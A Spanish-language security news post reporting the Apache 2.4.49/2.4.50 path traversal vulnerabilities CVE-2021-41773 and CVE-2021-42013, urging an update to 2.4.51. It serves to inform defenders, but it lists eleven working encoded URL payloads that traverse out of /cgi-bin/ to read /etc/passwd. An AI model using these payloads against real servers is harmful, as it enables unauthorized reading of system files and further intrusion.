5 oct 2021

Path Traversal crítico en Apache 2.4.49/50 - CVE-2021-41773/2021-42013 (Actualiza!)

Se ha publicado una vulnerabilidad en Apache 2.4.49 que se está reproducido in-the-wild. Es una nueva vulnerabilidad crítica de Path Traversal sólo en esa versión de Apache. La misma es identificada como CVE-2021-41773.

El ataque puede ser realizado de forma remota y no requiere ninguna forma de autentificación previa y así se ve un servidor vulnerable:

La falla radica en un cambio realizado en la normalización de rutas en Apache HTTP Server 2.4.49.

Un atacante podría utilizar un Path Traversal para obtener archivos fuera de la raíz del sitio web. Si los archivos no están protegidos por "require all denied", estas solicitudes pueden tener éxito. Además, esta falla podría filtrar la fuente de archivos interpretados como scripts CGI.

En este momento hay al menos 86.400 sitios vulnerables en Internet.

Actualización 06/10

la actualización 2.4.50 lanzada días atrás por Apache Foundation para corregir esta vulnerabilidad está incompleto y provocó la nueva vulnerabilidad identificada como CVE‑2021‑42013. Como resultado de esta falla, los atacantes pueden volver a ejecutar un ataque path transversal, lo que afecta a los usuarios del servidor web Apache 2.4.49 y 2.4.50.

Los investigadores Juan Escobar, de Dreamlab Technologies; Fernando Muñoz, de NULL Life CTF Team; y Shungo Kumasaka han reportado una nueva vulnerabilidad de severidad crítica que podría permitir a un atacante la ejecución remota de código y exfiltrar información.

Algunos Payloads para el CVE-2021-42013 de Apache 2.4.50:

  • /cgi-bin/%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  • /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
  • /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2/etc/passwd
  • /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  • /cgi-bin/.%2e/%2e%2e/etc/passwd
  • /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd
  • /cgi-bin/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
  • /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
  • /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
  • /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
  • /cgi-bin/.%2%65/.%2%65/.%2%65/.%2%65/etc/passwd

Se recomienda actualizar de inmediato a Apache 2.4.51. Aquí hay dos videos de la explotación.

Fuente: PTswarm

Suscríbete a nuestro Boletín

0 Comments:

Publicar un comentario

Gracias por dejar un comentario en Segu-Info.

Gracias por comentar!